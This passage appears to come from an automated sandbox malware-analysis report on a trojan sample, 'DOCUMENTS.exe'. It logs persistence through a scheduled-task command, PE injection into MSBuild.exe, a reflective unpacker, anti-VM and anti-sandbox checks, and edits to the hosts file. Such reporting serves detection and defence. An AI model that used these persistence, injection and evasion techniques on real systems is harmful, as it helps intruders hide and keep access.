                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0BF6 AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0BBF AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122AF3E AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122AF07 AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exeJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9BE9.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@6/6@0/1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMutant created: \Sessions\1\BaseNamedObjects\RAjRPPJiBWcsEVV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: DOCUMENTS.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                      Source: DOCUMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DOCUMENTS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: DOCUMENTS.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_00E3297F push 20000001h; retf
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E30E9 pushfd ; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E2EE5 push es; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E2D42 push cs; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ECD6C push ebx; iretd
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EA2D3 push ecx; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_01222948 push cs; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54267894462
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54267894462
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 1864, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFunction Chain: memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,memAlloc,threadDelayed,threadDelayed,memAlloc,memAlloc,memAlloc,processSet,sectionLoaded,sectionLoaded,processSet,keyOpened,keyValueQueried,memAlloc,keyOpened
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe TID: 776Thread sleep time: -37100s >= -30000s
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe TID: 2600Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep count: 107 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep time: -3210000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6204Thread sleep count: 37 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep time: -57064s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6184Thread sleep time: -55468s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05C02EF6 GetSystemInfo,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeThread delayed: delay time: 37100
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 30000
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 30000
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: DOCUMENTS.exe, 00000000.00000002.290373669.000000000370C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: MSBuild.exe, 00000009.00000003.482957609.000000000113F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: MSBuild.exe, 00000009.00000003.482957609.000000000113F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWtZ
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDD2B8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 402000
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 438000
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 43A000
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: DD7008
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: MSBuild.exe, 00000009.00000002.523780074.00000000018B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: MSBuild.exe, 00000009.00000002.523780074.00000000018B0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: MSBuild.exe, 00000009.00000002.523780074.00000000018B0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: MSBuild.exe, 00000009.00000002.523780074.00000000018B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: MSBuild.exe, 00000009.00000002.523780074.00000000018B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
